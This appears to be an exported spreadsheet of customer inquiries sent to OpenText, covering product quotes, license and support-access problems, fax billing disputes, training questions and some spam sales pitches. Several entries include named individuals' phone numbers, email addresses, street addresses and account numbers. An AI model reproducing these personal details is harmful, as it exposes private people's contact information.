  <si>
    <t xml:space="preserve">Hi there,_x000D_
Hope all is well! I would love to talk more about my company, Travel Plaza Media. TPM offers brand the ability reach a highly elusive audience during their daily journey through our digital and static inventory. TPM offers a network of Digital TV Screens and Large Format Banners throughout major markets and offers brands:_x000D_
 _x000D_
•	High Impact Creative Solutions_x000D_
•	Driving Brand Awareness_x000D_
•	Deliver Scale – 150MM+ yearly audience_x000D_
•	Exclusive Advertising Opportunity_x000D_
•	Average Dwell Time 17 Minutes_x000D_
•	The ONLY Form of Advertising along the Garden State Parkway in New Jersey_x000D_
 _x000D_
Below I have a brief video of our media format. I would love to set up a call early next week to share an overview document to help illustrate how a campaign can come to life. _x000D_
 _x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">User can not attach items when sending fax </t>
  </si>
  <si>
    <t xml:space="preserve">We use sage 50 accounts and our customer wants us to link up to Application Programming Interface (API) I would like to find out if sage 50 are able to have work with API? if its is how much would it cost to get the link set up? Thank you so much. Kind regards_x000D_
Eszti </t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for a quote on a temporary short term cloud solution for storing and sharing documentation. Thanks. </t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
 _x000D_
I’m reaching out to check if you would be interested in acquiring the “Legal Professionals Database 2019” to see a real time ascending curves for your products and services and launch a new email campaigns. The list can be used for Appointment settings, Email campaigns, Networking, Social media appending and many more._x000D_
  _x000D_
Complete Data fields: All our records includes permission based business email addresses and complete business contacts like contact name, company name, company URL, title, phone number, fax number, physical address, employee size, revenue size, SIC code, industry classification and last verified date._x000D_
 _x000D_
We give you minimum 90% accuracy guaranteed on emails._x000D_
_x000D_
Let me know your target criteria to send you count and cost information._x000D_
 _x000D_
Target Industry       : _x000D_
Target Geography   :_x000D_
 _x000D_
Thanks &amp; Regards,_x000D_
Rosy Wilson| Business Development coordinator_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hello, _x000D_
_x000D_
I am looking for an NDX transfer quote. _x000D_
_x000D_
Thank you_x000D_
Chris</t>
  </si>
  <si>
    <t>TO KNOW ABOUT OPENTEXT OFFERING IN THE CLOUD AND HOW IT IS CONSUMED BY A CUSTOMER</t>
  </si>
  <si>
    <t>Dear,_x000D_
_x000D_
We're from Deloitte (Belgium), looking for a case management / crisis management tool fit for our clients. We've prepared some questions (in an excel file). Can you provide us an e-mail address that we can send these questions to? We are looking at Dynamic Case Management and OpenText Process Suite._x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Seppe</t>
  </si>
  <si>
    <t>Trying to run a piece of older software that shipped with exceed / exceed 3d 14. Having a problem that exceed seems to get some file overwritten every time windows 10 updates. Wondering if there are any suggestions you might be able to offer, or if we should be looking at purchasing ver 15 so we can work around this repeated issue.</t>
  </si>
  <si>
    <t>We have some accounts here and nobody seems to know who/when they were set up and I'm unable to find any sort of admin account. I am being asked to give a couple new users access and not sure where to begin as I nor anybody else here have any idea where to do this. Any help you can give would be greatly appreciated.</t>
  </si>
  <si>
    <t>We are looking for a solution for Document management for our invoices and other relevant documents as per departments. Which we can classify as per invoice number, vendor, cost etc.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Support,_x000D_
I did not receive the file igckey.lic._x000D_
_x000D_
Feedback from service "licensing infograph ManualDemo" is:_x000D_
_x000D_
A demo license has already been issued for this computer. _x000D_
You cannot demo this product multiple times on the same computer. _x000D_
Please contact OpenText at 1-800-540-7292_x000D_
_x000D_
This license will be registered for the following MAC ID: (BC-30-5B-9A-C8-1C)_x000D_
_x000D_
Can you help me please._x000D_
Thx._x000D_
_x000D_
Best Regards,_x000D_
Janna_x000D_
</t>
  </si>
  <si>
    <t>BH</t>
  </si>
  <si>
    <t>I have subscribed for 1 year support. But every time I try to access "My Support" it asks me to verify my email. I have verified it more than 10 times. It gives message as "Our records indicate that you have registered for access to My Support but have not yet confirmed your email with us."._x000D_
_x000D_
Request your support. Need support to add ticket.</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
Je souhaiterais avoir une adresse mail de contact pour OpenText Madrid Espagne concernant la portabilité de numéros._x000D_
Cordialement,_x000D_
Le service portabilité</t>
  </si>
  <si>
    <t>I would like to know if you have successful references for financial institutions(preferred bank)? What is the rough cost for the basic CCM solution?</t>
  </si>
  <si>
    <t>YT</t>
  </si>
  <si>
    <t>Need more information about DMS, Big Data Analytics and DPA/RPA for existing opportunities. Thanks</t>
  </si>
  <si>
    <t>Would like to know more about the product, thanks</t>
  </si>
  <si>
    <t>Love</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
Société ayant plusieurs besoins d'éditions , je souhaite non seulement obtenir une licence partenaire mais également être votre relais auprès de vos clients sur le marché africain_x000D_
_x000D_
En attente de votre retour sur le coût des licenses_x000D_
_x000D_
A très vite_x000D_
_x000D_
Mr Love</t>
  </si>
  <si>
    <t xml:space="preserve">How to set send and receive fax through company email. How much it cost. Monthly, bundle yearly, and setup fees. And can we choose our fax number. </t>
  </si>
  <si>
    <t xml:space="preserve">Can i have information on the latest ECM suite 16. _x000D_
product overview_x000D_
Product Update_x000D_
Smart UI _x000D_
Content Suite User Interface. _x000D_
product overview_x000D_
</t>
  </si>
  <si>
    <t>I want to know more about Public Sector how did it works please give me the training about that</t>
  </si>
  <si>
    <t>We want the services for SAP ECC &amp; S/4 Archiving using open text  Please help us to get the license info. and any training to use this for our client.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi there I am looking to develop a work process platform that has scalability and allows be to add Iod  and real time alerts etc. _x000D_
Is your platform customisable and can I re-brand for re-sale?_x000D_
</t>
  </si>
  <si>
    <t>Hi, we have a customer looking for a document management solution whereby they can send documents to clients, setting them to expire and also manage whether they can print/copy/edit etc._x000D_
_x000D_
Does OpenText offer such a product?_x000D_
_x000D_
Thanks_x000D_
Jon</t>
  </si>
  <si>
    <t>IO</t>
  </si>
  <si>
    <t>Good morning_x000D_
I am trying to get a quote for a software renewal (Encase Forensic). I sent an email to my POC, Mr. Ginny Rhinehart, but is not replying._x000D_
Could you please provide me with a POC email?</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
I'm not able to create ticket for support. Could you please help me to get access. I need to create tickets._x000D_
Looking forward your response._x000D_
Regards,_x000D_
</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
_x000D_
I want trail version of DWG CAD file viewer for Asp net and C windows application._x000D_
_x000D_
Could you please help us to get 1 month trail version._x000D_
_x000D_
Thanks_x000D_
-Bala</t>
  </si>
  <si>
    <t>I am doing evaluation for the following products and I need the price list for the same._x000D_
Livelink Remote Cache Client Module_x000D_
BCC Invoice Solution_x000D_
File360 Primary Server_x000D_
Open Text - Filter Pack_x000D_
Livelink Object Importer and Exporter Module_x000D_
File360 Components_x000D_
Mult-File Print Doc ActiveX Control_x000D_
Livelink LAPI SDK (LAPI)_x000D_
Please Reply as soon as possible. _x000D_
It will help us more.</t>
  </si>
  <si>
    <t>Dear Sir,_x000D_
_x000D_
I am interested in partnership opportunity. Kindly connect me with the right person for the same._x000D_
_x000D_
Regards,_x000D_
Yusuf - Dubai.</t>
  </si>
  <si>
    <t>I need information about Content Server Builder, like its installation information, whether needs to be licensed, about its parent product. Thanks!!</t>
  </si>
  <si>
    <t>Dear,_x000D_
_x000D_
At Nutricia Cuijk we use QNSE, we had some difficulties start this year in updating our QN license. But this al has been set up now. Also I tried to setup an login account te create tickets, login is possible but when I go to the tickets tab I get the message a mail will be sent to confirm. I receive the mail but when I click on the link I got into a loop of creating an mail accepting and receiving a new mail._x000D_
_x000D_
Please help _x000D_
_x000D_
Arie Tax</t>
  </si>
  <si>
    <t xml:space="preserve">Require a help to open a P1 ticket to create SYSDP.XENOS.D2E.META.IVPOBJS.LGO dataset  </t>
  </si>
  <si>
    <t>Spicer tool purchase details</t>
  </si>
  <si>
    <t>I would like to enquire the following regarding the EnCase™ Certified Examiner Certification Program (EnCE) - International:_x000D_
•       Cost per individual;_x000D_
•       Is it an online course or instructor led; and_x000D_
•       If it is instructor led what are the available dates for the course within the next three months?</t>
  </si>
  <si>
    <t>Please help us to reset our password, as we are unable to update new password</t>
  </si>
  <si>
    <t>Please let us know the cost of OpenText Imaging_x000D_
Enterprise Scan software.</t>
  </si>
  <si>
    <t>Hello I was going to apply for Liaison's Data-Inspired Future Scholarship on fastweb. When I clicked on the icon apply now it brought me in a webpage, where I couldn't find any place where it says apply for a scholarship. So please could i get information about where and how to apply. I have my video done already its just that I need to send it out to be entered for the scholarship!!_x000D_
Please let me know.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello And Good Day_x000D_
_x000D_
I am Max,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t>
  </si>
  <si>
    <t>I am working for a Chinese branch of an American company-9to5 seating. We're using the Gupta report builder 4.0, if I want to get the product media code for this software, what should I do?</t>
  </si>
  <si>
    <t>Mei</t>
  </si>
  <si>
    <t>Interested on how we can improve the productivity and efficiency on auto posting of paper (hardcopy) invoices into SAP using OCR.</t>
  </si>
  <si>
    <t>Management Consultant seeking Content Management Solution options for government entity client. Need to talk with sales rep about licensing costs and professional services.</t>
  </si>
  <si>
    <t xml:space="preserve">Our account is under the name of the previous Director and with our old hospital name (Janet Galaway Graham and Medical Center Arlington).  Would you please update the account information to Laura J Cullen and Medical City Arlington?_x000D_
_x000D_
I just received the invoice dated 1/2/2019, number 08011731901 for billing period 12/1-12/31/2018 on 2/19/2019.  I've been in this position since 11/5/2018 and this is the first invoice I've received.  What service(s) is this invoice of $5.82 pertaining to for my Department?_x000D_
_x000D_
I appreciate your prompt response._x000D_
_x000D_
Thanks!_x000D_
Laura J Cullen, CPMSM, CPCS_x000D_
Director_x000D_
Medical Staff Services_x000D_
Medical City Arlington_x000D_
3301 Matlock Rd._x000D_
Arlington, TX 76015_x000D_
P:  682-509-6505_x000D_
C:  817-458-2727_x000D_
F:  469-713-8148_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I need to gain access to the Opentext Exstream support site in order to submit tickets, review knowledge base/articles, etc, gain assistance with functionality questions.  Please provide a contact number in order to obtain assistance._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Ty</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
_x000D_
I want to take the following course: 5-7650 Exstream Developer Certification v16.3_x000D_
_x000D_
It's prerequisits are as followed:_x000D_
1-7610 Exstream Designer v16.3_x000D_
1-7611 Exstream Advanced Designer v16.3_x000D_
_x000D_
I want to know that will i be able to directly take the exam, or do i have to enroll in the prerequisites._x000D_
_x000D_
Thanks_x000D_
</t>
  </si>
  <si>
    <t>Hi there,_x000D_
_x000D_
Do you have an implementation partner in the Philippines?_x000D_
_x000D_
We are looking at Open Text Content Suite._x000D_
_x000D_
Best,_x000D_
Louie</t>
  </si>
  <si>
    <t>We are looking to replace our current DAM system and we are particularly interested in a system that support facial recognition.</t>
  </si>
  <si>
    <t xml:space="preserve">Good evening, I've applied for the Director, International PR position in Grasbrunnn advertised on LinkedIn jobs but it looks like my application did not come through. It would be great if you could confirm you received my CV for this position. Thank you and kind regards, Yasmine </t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
_x000D_
We would like to speak to someone about OpenText's capabilities to migrate one of our Oracle Forms application to Java stack based on an automated tool approach. Please have the person contact me at DasJ2@michigan.gov or at 517-284-4830. _x000D_
_x000D_
Regards,_x000D_
_x000D_
Jayadeep Das_x000D_
_x000D_
Functional Integrator | Strategic Integration Administration | MDHHS_x000D_
Grand Tower, 2nd floor, 235 S. Grand Ave, Lansing, MI 48933_x000D_
Romney Building, 12th floor, 111 S. Capitol Ave, Lansing, MI 48933_x000D_
517-284-4830 (desk) _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">On December 12, 2018, my fax account was canceled. However, on December 21, 2018, you charged me the  annual supscrition for $149.95 to my American Express credit card._x000D_
_x000D_
I will request you refund me the full amount to my American Express credit card._x000D_
</t>
  </si>
  <si>
    <t>We currently use the old Faxpress product from OpenText and need information about upgrading to RightFax.  Also need to discuss EHR and MFD integration as well as FoIP.</t>
  </si>
  <si>
    <t xml:space="preserve">We need urgent help to configure rightfax to work with office 365. We received a PDF file with directions, but the directions are not to well written. We need someone to contact us. </t>
  </si>
  <si>
    <t>Solaris 11.4 uses Gnome 3.24 (vs 2.30 in Solaris 11.3) and expects 3D acceleration to be available.  Does Exceed TurboX allow for the remote display of a Solaris 11.4 desktop to a Windows PC?</t>
  </si>
  <si>
    <t>Good day_x000D_
I am acybersecurity professional and  interesting to do the EnCe certification, however, I am not seeing where to download the application or apply online. Please direct me accordingly._x000D_
_x000D_
Thanks much.</t>
  </si>
  <si>
    <t xml:space="preserve">Accounts Receivable Dept:_x000D_
Please submit a copy of your W9 Form with your address at 24685 Network Place  we have an old address in our system.  Please contact me at AdyAncona@fico.com_x000D_
Thank you,_x000D_
</t>
  </si>
  <si>
    <t>Looking to setup a demo for document management solution</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for a solution that will allow scanning to a web hosted application. </t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I am integrating SAP hybris commerce with open text and would like to request a copy of the extension of open text digital asset management for sap solutions. </t>
  </si>
  <si>
    <t>Testing please respond to me once received.</t>
  </si>
  <si>
    <t xml:space="preserve">Are your "Liaison’s Data-Inspired Future Scholarship" applications still open to submit an entry? </t>
  </si>
  <si>
    <t>We are a long time DocSci Xpressions customer  - customer # 10179110. I would like for our account rep (assuming we have one) to get in touch with me to discuss the future of the product.</t>
  </si>
  <si>
    <t>How long it the trial period for the Open Text Host Explorer software?</t>
  </si>
  <si>
    <t>I have inherited a FaxPress 4L Serial # 62203343 here at Oak Street Medical.  Can you tell me what the support status is on those systems?  If they are EOL, when did they go EOL?_x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>Interested in getting a quote to upgrade our existing Exceed onDemand licenses to the Turbo version.</t>
  </si>
  <si>
    <t>I would like to get contact info for our account rep. I need to clarify account information.</t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to access my support but always keep saying not able to identify the account and every time getting verification mail. I have verified multiple times and not able to login. Please assist how to proceed further. </t>
  </si>
  <si>
    <t>I have a invoice here but I need a W-9 to pay it I have requested it but haven't gotten anything in the last month.</t>
  </si>
  <si>
    <t>When/where is Enfuse 2019? I see no mention of it directly from your site, but third party sites allude to it occuring in Vegas in August. Can you direct me to the official page displaying confirmed info for this conference?</t>
  </si>
  <si>
    <t>Can you tell me if OpenText Liguid Office is a component of OpenText Extreme or any other Opentext Product?</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
You have a creditnote open in our system._x000D_
I would like to get in touch with your finance departmen_x000D_
_x000D_
Thanks a lot</t>
  </si>
  <si>
    <t xml:space="preserve">I was just looking for a quote for the RightFax Service and looking for some pricing. If you could please email me a quote of your services (per user), that would be great!_x000D_
_x000D_
Thank you!_x000D_
_x000D_
Sara Shoemate </t>
  </si>
  <si>
    <t xml:space="preserve">Give me a call about migrating our Current Documentum System to OpenText CS.   _x000D_
</t>
  </si>
  <si>
    <t>I am needing to set your company up as a vendor and will need a copy of your W-9 tax information to do so. Thank you.</t>
  </si>
  <si>
    <t>Hello. We would like to renew our RightFax support directly with OpenText, rather than through a reseller. The last renewal specialist I dealt with appears to have left the company. Can someone please contact me to help arrange a quote?</t>
  </si>
  <si>
    <t>Hello I need someone to contact me about what licenses we own with the support end date.  I think we have some support that we need to update.</t>
  </si>
  <si>
    <t>Good afternoon,_x000D_
_x000D_
Our account (6325356) with EasyLink was cancelled on 31st August 2017_x000D_
_x000D_
However, a direct debit of £480 was taken on 22nd January 2018 for September, October, November &amp; December 2017_x000D_
_x000D_
We also didn't receive an invoice for the month of July 2017 _x000D_
_x000D_
I therefore request the following from yourselves:_x000D_
_x000D_
1. Please can you send through credit notes and refund the payment which has come out of our bank account of £480.00_x000D_
2. Please can you send a copy of the July 2017 invoice which we have not received so that we can match the July payment to it_x000D_
_x000D_
If there is someone specific who I need to contact please let me know_x000D_
_x000D_
Thank you_x000D_
Kind regards_x000D_
Beth</t>
  </si>
  <si>
    <t xml:space="preserve">Unable to access My Support. Continuously requires confirmation of email. </t>
  </si>
  <si>
    <t>WHen I try to use test drive, it sends me a token but when I click the link it asks me to request a token again. I've used test drive many times before with no issue. Please help. I need to do a demo for a potential new customer._x000D_
_x000D_
Thanks,_x000D_
Donnie</t>
  </si>
  <si>
    <t xml:space="preserve">Is IRM Client for PDF 5.1.1011 compatible with Windows 10. I installed this on a workstation that has Adobe Reader and Adobe Acrobat DC Professional installed, and when I try to install IRM Client, it tells me it doesn't see Reader or DC installed. </t>
  </si>
  <si>
    <t>Need access to Support Area</t>
  </si>
  <si>
    <t>I would like to obtain access to the Gartner 2017 Critical Capabilities for Content Services Platforms (CSP) report.  I foudn this extremely useful at the time. The content is no longer available online.  Would you be able to send me a .pdf copy?  Much appreciated.  Kind regards, Stephanie</t>
  </si>
  <si>
    <t>Hi there, I am a lecturer at university that uses EnCase as part of module teaching. I am wondering if there is a certification program available that we can take or offer to students through the EnCase.</t>
  </si>
  <si>
    <t>Please could we download a new version of Exceed and Exceed 3D, we have a very old version 14</t>
  </si>
  <si>
    <t>Dear Sir/Madam, I have requested for a contact in respect of contact responsible for NCOC end user based in Kazakhstan. Is there a chance we can have a chat on this?_x000D_
Thanks,_x000D_
Denis</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We are supplying equipment/services to the Nigerian Police and as a part of this have a request for your products as follows:_x000D_
_x000D_
Encase Forensics x 1_x000D_
Encase Forensics SMS 1 Year_x000D_
_x000D_
This is URGENT and is required to be submitted today, so would appreciate your earliest action._x000D_
_x000D_
Many thanks._x000D_
_x000D_
Neil Ingha,</t>
  </si>
  <si>
    <t>Hi! I am a Master of Information Studies student, taking a course in about knowledge taxonomies. I am wondering if it is possible to obtain a trial of the Opentext Semantic Navigation software for one of my course assignments. The assignment is to look at software that supports taxonomy development and demo it for the class. _x000D_
If this is possible, please let me know. _x000D_
Thanks,_x000D_
_x000D_
Megan</t>
  </si>
  <si>
    <t>I recently received a new computer at my job. The new computer does have the Redactit program on it. However, when I go to use it I get an error that says there is no license. Could someone assist me with this. Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">We would like to schedule a time to have someone install EnCase on a new server. We will decommission the old server once it is up and running. </t>
  </si>
  <si>
    <t xml:space="preserve">I'm using Open Text Exstream, I would like to have SDK starter that contains HTML and BarCode Add-in._x000D_
If I can have specification to implement them, that would be great_x000D_
_x000D_
Regards_x000D_
Thomas MALLEGOL </t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
wir suchen aktuell für eine Softwarelösung im Bereich Dokumentengeneration mit Daten aus SAP. Ein Archivierungssystem besitzen wir jedoch bereits. Bieten Sie auch eine reine Dokumentengenerierungslösung an?_x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Tobias Tiemann</t>
  </si>
  <si>
    <t xml:space="preserve">Dear OpenText Team_x000D_
_x000D_
I would like to get a like to Guidance Software License Manager Web Process to install EnCase Endpoint Investigator I am using._x000D_
_x000D_
Best Regards_x000D_
Kyungyong Han_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear OpenText Team_x000D_
_x000D_
I would like to get link to Guidance Software SAFE Setup Web Process to install EnCase I am using._x000D_
_x000D_
Best Regards_x000D_
Kyungyong Han_x000D_
</t>
  </si>
  <si>
    <t>A colleague of mine made a reference to your product. Within Capita I mange a support team with strong voice recording/WFO capabilities and am enquiring as to what accreditation exists for partners but also if there are any technical documents on your products I could browse through?</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
_x000D_
We are facing issue while trying to open documents in our GEB systems._x000D_
We are getting the error message as_x000D_
Connect Error: Connect to Host error: NIECONN_REFUSED_x000D_
We checked from our end and found that tomcat services are up and running fine._x000D_
We also checked by using the command spawncmd status which showed only one DB service up. Also, we tried to dbtest from our end on the server and found that it is showing the status as 'Trying to connect' which should be in Connected status._x000D_
Also, we checked the port status with netstat and found the status as 'CLOSE_WAIT'_x000D_
Also, we observed the directory /u01 100% filled so we tried to move some files and now the directory size is showing as 87% filled still we are unable to open the documents._x000D_
Kindly help us on this issue at priority._x000D_
_x000D_
Thanks,_x000D_
Basis Team</t>
  </si>
  <si>
    <t>Dear Sirs and Mesdames_x000D_
My name is Sergei Ivanov, I am an Influencer Marketing Manager in Zorka Mobi Creative Mobile Performance Agency._x000D_
_x000D_
We are looking for influencers, who can help us promote an application called "Callmart" using a blog or a personal website. _x000D_
This application is designed to link those who are looking for professional consultations in different spheres with those, who can share required knowledge._x000D_
Can you please tell me if it is possible to post promotion posts in blogs of your website?_x000D_
Please mail me back if you are interested in this cooperation to discuss further steps._x000D_
_x000D_
Thanks_x000D_
Best Regards</t>
  </si>
  <si>
    <t>I want to work with you as a partner by providing media content and messages to suit your clientele needs. As a company, we are working with many industry players like Kirusa, IMI Mobile and the rest. I will be glad to engage more meaningfully and even tell you many of the things we can do to assist in the development of your company. Thank you.</t>
  </si>
  <si>
    <t>Hello, _x000D_
I've a query about cloud-based solution, can any one contact me and explain how it is work. as well as the pricing.we are using Right Fax Enterprise.</t>
  </si>
  <si>
    <t>I need to get a approver for a car loan</t>
  </si>
  <si>
    <t xml:space="preserve">We would normally purchase your products via Infinigate but they have pointed me in your direction. I need a renewal quote for my customer, please can someone email/call me to discuss? Cheers,_x000D_
_x000D_
Tom </t>
  </si>
  <si>
    <t xml:space="preserve">Hi!_x000D_
_x000D_
Please update the certificates for the Exceed TurboX test service, etx11demo.opentext{.com}. I won't access it while Chrome tells me it isn't safe._x000D_
</t>
  </si>
  <si>
    <t>We need to do the OCR solution.</t>
  </si>
  <si>
    <t xml:space="preserve">To whom it may concern,_x000D_
My name is Guillermo Vergara, I work as an Analyst for Grupo Sum. _x000D_
I am contacting you because we are searching for a management and analysis application for Social Networks and Whatsapp. _x000D_
I would really appreciate if you could provide me with more information about the services that you offer._x000D_
Thank you in advance,_x000D_
Kind regards,_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
our company has a support contract with OpenText and i need access to "open a Support ticket". Which information are you needing from me for give my account that access?_x000D_
_x000D_
Regards,_x000D_
Tim Grunenberg</t>
  </si>
  <si>
    <t>Hi,_x000D_
we have an old contract for the use of Xpedite for fax sending._x000D_
This was set into place by a predecessor of ours and want to stop this service._x000D_
Our client number is 75615 and the contact was Stefan Tournoy. Stefan doesn't work here anymore._x000D_
Could you please inform us on how to proceed with this?_x000D_
_x000D_
kind regards,_x000D_
Steve</t>
  </si>
  <si>
    <t xml:space="preserve">we are interested in your DMS and we would like to have a demo on the functionality.  </t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
we have used Easylink for the last years in conjunction with our business relationship with Toys R Us. Above Easylink we have processed the Container business (Orders etc.)._x000D_
_x000D_
Now Toys R Us changed into Smyths Toys and we don't need Easylink any more as the process of the Container business is now different._x000D_
Unfortunately I couldn't find any contract so I don't know how I have to terminate the contract._x000D_
_x000D_
Furthermore we are no longer able to log-in to Easylink. Is it possible that our log-in is already cancelled? But if this is the case why we had to pay the monthly invoice for January? Also I would need the invoice of January for our bookkeeping. I'm not able to print the invoice by myself as I'm not able to log-in anymore._x000D_
_x000D_
Please give me a feedback as soon as possible._x000D_
_x000D_
Thank you in advance._x000D_
_x000D_
Best regards_x000D_
Nadja Steinbrunner_x000D_
_x000D_
ABC Design GmbH_x000D_
Dr. Rudolf-Eberle-Str. 29_x000D_
79774 Albbruck_x000D_
Germany</t>
  </si>
  <si>
    <t xml:space="preserve">We suddenly found our account is unable to login My Support. It keep saying the email address should be verified. However, we received the verification email and clicked the confirmation link 3 times. The problem is still there._x000D_
_x000D_
Here is login name of our account: cnshaftopr@deloitte.com.cn. Could you please help to check?_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">After processing evidence file,  its giving an error as below_x000D_
"Error submitting job to Processing Node 'Local Machine': HTTP Response: Bad Request [400]" In status column. _x000D_
Please suggest your expert guidance for the same. </t>
  </si>
  <si>
    <t>I am unable to access OpenText knowledge base.</t>
  </si>
  <si>
    <t>I want job</t>
  </si>
  <si>
    <t xml:space="preserve">i want to sep up the EDDL form need your help about that </t>
  </si>
  <si>
    <t>I need to figure out how to split where our faxes go by phone number._x000D_
I would have made a ticket but it is telling me my account doesn't have access to the ticket system.</t>
  </si>
  <si>
    <t xml:space="preserve">Deposit Roy HEAFNER </t>
  </si>
  <si>
    <t>I'd like to know who services the VA's Honolulu RightFax contract.  I'd like to download and install the RightFax COM object / .DLL so I can fax from MicroSoft Excel using VBA._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Jess</t>
  </si>
  <si>
    <t xml:space="preserve">We are receiving invoices for a predecessor company.  Invoice 9000963415 was mailed to our physical address, but the ship to address on the invoice is not ours.  We aquired this location from Phillips &amp; Temro in 2014.  You will need to contact Phillips &amp; Temro to get this resolved.  You may contact me at the number above with any questions. _x000D_
</t>
  </si>
  <si>
    <t>Hello -- I have an acquisition opportunity that I would like to share with the Company.  Could you please connect me to the appropriate person in corporate development?  Many thanks.</t>
  </si>
  <si>
    <t>I'm looking for a quote for Encase forensic imager to help capture forensically sound images and allow for a triage review of artifacts in read only file.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
xPression 4. Administrator Certification_x000D_
_x000D_
I would like to know the best way to complete this certification.  I understand there are some pre requistes - I believe I have 1 of them completed._x000D_
_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Jeff_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I am interested in obtaining the EnCE certification. I have been a forensic examiner for 2 years. I do not have a lot of experience with EnCE. What training package do you offer and recommend for someone like myself that has limited EnCE experience?</t>
  </si>
  <si>
    <t>Interesse em aquisição de ferramenta de gerenciamento de conteúdo (CMS)</t>
  </si>
  <si>
    <t>What adapter would I need to image an intel ssdsckkf256h6 which is a SATA SSD with a B+M key? I looked at the TDA7-2 but it says it's not compatible with SATA SSD.</t>
  </si>
  <si>
    <t>I am trying to register for course - 1-0184 Managing Documents in Content Server v16.2 and would like to receive the Government of Canada rate.  I see no way of doing this in the training form.</t>
  </si>
  <si>
    <t>Whats the cost of Edocs DM</t>
  </si>
  <si>
    <t>I'm a Business Operations Associate for Counterpoint Consulting, one of OT's partners and I need access to OpenText My Support  as well as the deal desk</t>
  </si>
  <si>
    <t>I will be registering on the upcoming Opentext Enterprise World 2019, I would like to request for the promo code for the Government Registration from July 9-11 Conference. Thank you</t>
  </si>
  <si>
    <t>Interested in a demo of your Open Text Archive</t>
  </si>
  <si>
    <t>How do I activate what I bought from Open text?_x000D_
1 YR ENCASE ANNUAL TRAINING PASSPORT_x000D_
Guidance Software - Part#: 1000045609</t>
  </si>
  <si>
    <t>I am a current customer and I have been in contact with Michelle O'Brien-Knuth about purchasing TrustedLink for windows but I have not heard back for over a week. If unavailable could there be someone else I could get in contact with about purchasing this product?  Thanks</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We recently had our Support contract end with RightFax Express.  Since then, we have noticed that faxes are no longer forwarding to e-mails.  Is there any correlation between the support contract ending and losing this functionality?  If there is any guidance you can give, it would be very much appreciated as several of our users are dead in the water without the forwarding feature._x000D_
_x000D_
Thanks,_x000D_
Kevin Eimers</t>
  </si>
  <si>
    <t>My objective is to upload files from a disk into LiveLink. The files on the disk are inside file folders. LiveLink will not allow me to drag and drop file folders to upload the documents. LiveLink only allows me to drag and drop individual PDF's. Is there any way to upload large amounts of file folders into LiveLink?</t>
  </si>
  <si>
    <t>Would like more information on eDOCS DM</t>
  </si>
  <si>
    <t>Do you have a cloud based SaaS application for Control Tower management?_x000D_
If yes, please let us know.</t>
  </si>
  <si>
    <t>Wondering how to transfer Brava Desktop from my old computer (Vista) to my new one (windows 10). Any help would be appreciated.</t>
  </si>
  <si>
    <t>I am not able to download version 7.16 from the site.  It says that I don't have support.  Can you please provide access.</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
nous sommes éditeur de solution GERD PLM BPM et je cherche un outil en marque blanche pour l’associer à notre solution pour réaliser des tableaux de bord et du reporting BI</t>
  </si>
  <si>
    <t>I need to purchase 3 licenses of Autocad Only (DWG, DXF and DWF). Kindly assist on how I can go about it</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to have access to this site. </t>
  </si>
  <si>
    <t xml:space="preserve">I'm conducting an RFI to get system recommendations and integration consulting for a knowledge management solution and would like to talk to someone in sales/account mgmt to provide our high level requirements and learn what the Enterprise Content Management may offer our content services needs. </t>
  </si>
  <si>
    <t xml:space="preserve">I am not receiving any faxes or confirmation emails when using Fax2Mail.  Our support area resent a fax to me as well as sent a test fax &amp; I did not receive either.  This is my primary fax line.  </t>
  </si>
  <si>
    <t>I need to open a ticket for a production issue on my project done with your team (expert) but I can't do it with my account. Thanks' to unlock quickly</t>
  </si>
  <si>
    <t>In unserem Unternehmen ist OpenText VIM seit einiger Zeit im Einsatz. Im Zuge eines neuen Projektes soll internes Know-How für folgende Rollen aufgebaut werden:_x000D_
_x000D_
1. Business Analyst: Customizing -&gt; Customizing-Schulung_x000D_
2. Application Manager mit VIM-, aber ohne ICC-Erfahrung -&gt; Delta-Schulung_x000D_
3. Application Manager ohne VIM-Erfahrung -&gt; vollständige Entwicklerschulung_x000D_
_x000D_
Können Sie mir für diese Rollen geeignete Kurse nennen? Vielen Dank!</t>
  </si>
  <si>
    <t>I am not receiving email notifcations for incoming faxes or outgoing confirmations.  My support team has already confirmed the email address is correct.  Faxes are being received by the main mailbox (as I was forwarded them via PDF in an email for the last week they have been missing), but I am not receiving the faxes directly to my inbox.</t>
  </si>
  <si>
    <t>I am setting up a user on your site, I am wondering do we have a maintenance agreement with opentext. _x000D_
Our complete information is:_x000D_
ACE Controls, Inc._x000D_
